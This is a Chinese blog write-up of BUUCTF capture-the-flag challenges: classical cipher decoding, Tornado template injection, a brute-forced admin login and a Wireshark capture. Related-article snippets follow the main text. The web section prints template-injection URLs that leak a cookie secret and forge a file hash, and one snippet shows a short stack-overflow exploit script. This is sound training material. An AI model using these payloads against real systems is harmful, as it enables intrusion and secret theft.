buuctf8

最新推荐文章于 2024-06-19 19:49:59 发布
最新推荐文章于 2024-06-19 19:49:59 发布
阅读量318 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75317918/article/details/130532052
版权

目录

crypto

摩丝

password

变异凯撒

Quoted-printable

Rabbit

web

        [护网杯 2018]easy_tornado

       [HCTF 2018]admin

misc

被劫持的神秘礼物​编辑

crypto

摩丝

下载文件,得到一串摩斯密码

 在线解码

password

下载文件

张三英文zs,加上生日,即password

变异凯撒

下载文件

 变异凯撒,直接凯撒解码得不出

对照ASCII码:afZ_ ASCII码分别是97,102,90,95
flag的ASCII码则是102,108,97,103
猜测分别加 5,6,7,8,9,10

自己对照也行,或者写个脚本

s='afZ_r9VYfScOeO_UL^RWUc'
j=5
for i in s:
    print(chr(ord(i)+j),end='')
    j += 1

得到flag{Caesar_variation}

Quoted-printable

下载文件

了解一下Quoted-printable

Quoted-printable可译为“可打印字符引用编码”,编码常用在电子邮件中,如:Content-Transfer-Encoding: quoted-printable ,它是MIME编码常见一种表示方法! 在邮件里面我们常需要用可打印的ASCII字符 (如字母、数字与"=")表示各种编码格式下的字符!Quoted-printable将任何8-bit字节值可编码为3个字符:一个等号"=“后跟随两个十六进制数字(0–9或A–F)表示该字节的数值。例如,ASCII码换页符(十进制值为12)可以表示为”=0C", 等号"="(十进制值为61)必须表示为"=3D",gb2312下“中”表示为=D6=D0。除了可打印ASCII字符与换行符以外,所有字符必须表示为这种格式。
在线解码,外包flag

Rabbit

下载文件

Rabbit编码特点:开头部分通常为U2FsdGVkX1

(AES、DES、RC4、Rabbit、Triple DES、3DES 这些算法都可以引入密钥,密文特征与Base64类似,明显区别是秘文里​​+​​​比较多,并且经常有/)

rabbit解码,外包falg

web

[护网杯 2018]easy_tornado 

1.打开环境,有三个链接

 2.点击

 

flag在文件fllllllllllllag里面,需要考虑怎么进入文件里面

render是tornado里面的渲染函数,就是对web网页界面进行编辑的函数,和template的渲染相似,主要区别render是以脚本的方式进行渲染,template是以html方式进行渲染。这个重点在于是服务器模板,tornado是用Python编写的Web服务器兼Web应用框架,简单来说就是用来生成模板的东西。和Python相关,和模板相关,基本可以确定这是ssti(服务器模板注入),服务器模板注入和sql注入等有相同性,问题的关键在于传参

3.链接的url里面有两个参数一个是filename,一个是filehash,也就是说filename是第一个文件的提示,filehash是第三个文件的提示,那么如何获取cookie_secret。

cookie_secret不是通用的属性,也就可以确定,应该是存放在服务器模板中的值,问题就转化为通过传参获取cookie_secret的值。

4.改变filename的值为1,则报错

 看url,说明要通过msg的值进行传参

5.Templates and UI — Tornado 6.1 documentation

tornado的官方文档,一 获知传参的类型,二 找到cookie_secret的赋值方法

传参必须用双花括号

在tornado模板中,存在一些可以访问的快速对象,这里用到的是handler.settings

Tornado框架的附属文件handler.settings中存在cookie_secret

Handler这个对象,Handler指向的处理当前这个页面的RequestHandler对象

RequestHandler中并没有settings这个属性,与RequestHandler关联的Application对象(Requestion.application)才有setting这个属性。

handler 指向RequestHandler

而RequestHandler.settings又指向self.application.settings

所有handler.settings就指向RequestHandler.application.settings了

6.构造payload

http://ed4444e8-ec19-40b7-a95a-e6f3b63e1c94.node4.buuoj.cn:81/error?msg={{handler.settings}}

cookie_secret:为'60f69f61-5fcd-42b0-aae0-e021305a49ca'

根据提示filename为/fllllllllllllag,进行md5加密为3bf9f6cf685a6dd8defadabfb41a03a1

 再整体cookie_secret+filename进行md5加密,得到filehash的值

 7.构造payload

http://ed4444e8-ec19-40b7-a95a-e6f3b63e1c94.node4.buuoj.cn:81/file?filename=/fllllllllllllag&filehash=1ec0af843280e1dacd8e57f21493f3f1

 [HCTF 2018]admin

1.启动环境。。。真的找了很久才找到右上角的登录和注册

 2.登录界面

 3。使用bp爆破,密码123

 

misc

被劫持的神秘礼物

下载文件,在wireshark里面分析。追踪TCP流

得到账号是admin,密码是adminb

 根据提示,合在一起进行md5加密

木…
关注
BUUCTF
Q221022的博客
02-12 1195
1.old-fashion 直接用quiqiup解密即可得到flag 2.世上无难事 看到答案是32位,我就想到了MD5,然后用MD5解密,不对,不是MD5,所以就用quipqiup试试,key就出来了 3.RSA3 题上有两组c和e,只有一个n,(所以猜测这两组应该用的是同一个n)将n分解成p和q(不知道为什么,我用了三个网站都没分解出来,是因为数字太大吗?)然后,就可以求出私钥d,进而解密出m ,得到答案 4.RSA2 dp=d mod (p-1) 我认为..
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
buuctf之ciscn_2019_n_8
weixin_54452942的博客
04-12 455
两个方法解题
BUUCTF:greatescape
末初的CSDN博客
08-02 1692
题目地址:https://buuoj.cn/challenges#greatescape 下载附件得到一个流量包,追中TCP流,在tcp.stream eq 18,发现ssc.key 在tcp.stream eq 19看到rsa私钥格式的key 将私钥先保存下来名为ssc.key 通过分析流量猜测,这应该在向ftp服务器传送私钥,我们得到了私钥,就可以解密TLS报文 Edit->Preference->Protocols->TLS,点击Edit,然后点击+添加Key File 然后
BUUCTF】rip
^_^
12-08 3230
这题和蒸米ROP的level3有点像。 检查安全机制。 用ida反汇编,可以看到是gets函数有个简单的栈溢出,偏移也很好计算,F+8=23 此外还发现一个fun函数可以直接跳转到这里来获取shell。 正常exp如下: from pwn import * p = process("./pwn1") #p = remote("node3.buuoj.cn",29399) payload = "a" * 23 +p64(0x401186) p.sendline(payload) p.interact
BUUCTF 摩丝 1
YueXuan_521的博客
06-06 324
BUUCTF 摩丝 1
Buuctf Http
Dexret的博客
12-07 2261
打开该靶机,发现该靶机为一个普通的页面 查看一下该网页的源码 发现有一个Secret.php的网页,打开该网页 这里提示我们需要从https://Sycsecret.buuoj.cn去访问该网页 利用Burpsuite对该网页进行抓包,添加referer值 Referer:https://Sycsecret.buuoj.cn 添加完referer值后发现,又需要我们通过Syclover浏览器去访问该网页 修改User-Agent值 User-Agent:Syclover ..
BUUCTF LSB 1
YueXuan_521的博客
10-27 484
BUUCTF LSB 1
BUUCTF easycap 1
YueXuan_521的博客
11-06 518
BUUCTF easycap 1
BUUCTF 二维码 1
YueXuan_521的博客
10-16 850
BUUCTF 二维码 1
BUUCTF FLAG 1
YueXuan_521的博客
11-03 625
BUUCTF FLAG 1
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF部分web题目
05-06
写题记录
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
MVC 框架安全
A526847的博客
06-17 558
举例来说,在“注入攻击”一章中,我们并没有使用 PHP 的 magic_quotes_gpc 作为一项 对抗 SQL 注入的防御方案,这是因为 magic_quotes_gpc 是有缺陷的,它并没有在正确的地方 解决问题。其次,对于一些常见的漏洞来说,由程序员一个个修补可能会出现遗漏,而在框架中统一 解决,有可能解决“遗漏”的问题。最后,在每个业务里修补安全漏洞,补丁的标准难以统一,而在框架中集中实施的安全方 案,可以使所有基于框架开发的业务都能受益,从安全方案的有效性来说,更容易把握。
安全】Linux Fanotify使用入门
追寻梦想的青春
06-19 443
fanotify是另一种文件监控机制,在使用上两者类似,都是先调用init函数初始化句柄,然后调用类似watch的函数添加监控路径,再使用select+read的方式读取出变化的事件,根据事件中给出的参数获取文件的路径、事件类型以及其他需要的数据。如果是监控主机上的路径,directed结合FAN_EVENT_ON_CHILD标志就只能监控目录以及目录下的文件,per-mount可以监控pathname所在的挂载点中所有文件或者目录的变化,而global模式可以监控整个文件系统。
前端开发之浏览器安全
最新发布
weixin_45511682的博客
06-19 831
浏览器安全,#XSS攻击、CSRF攻击、中间人攻击、前端安全问题与防范、网络劫持防范
SSL证书怎样配置部署更安全
2301_77689616的博客
06-19 175
可以考虑使用自动化的证书管理工具,如Certbot或Let's Encrypt,来自动化证书的颁发和更新过程,减少人为操作的疏漏。通过使用强大的加密算法、强制HTTPS、定期更新SSL证书、配置安全的服务器环境和进行安全的证书管理,可以帮助网站管理员更好地保护网站的安全。可以考虑使用证书管理工具来集中管理证书,定期检查证书的有效期和状态,以及证书的使用情况,确保证书的有效性和安全性。它通过建立安全的连接,确保网站的身份和保护用户的隐私,是网站安全的重要组成部分。5.进行安全的证书管理。
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值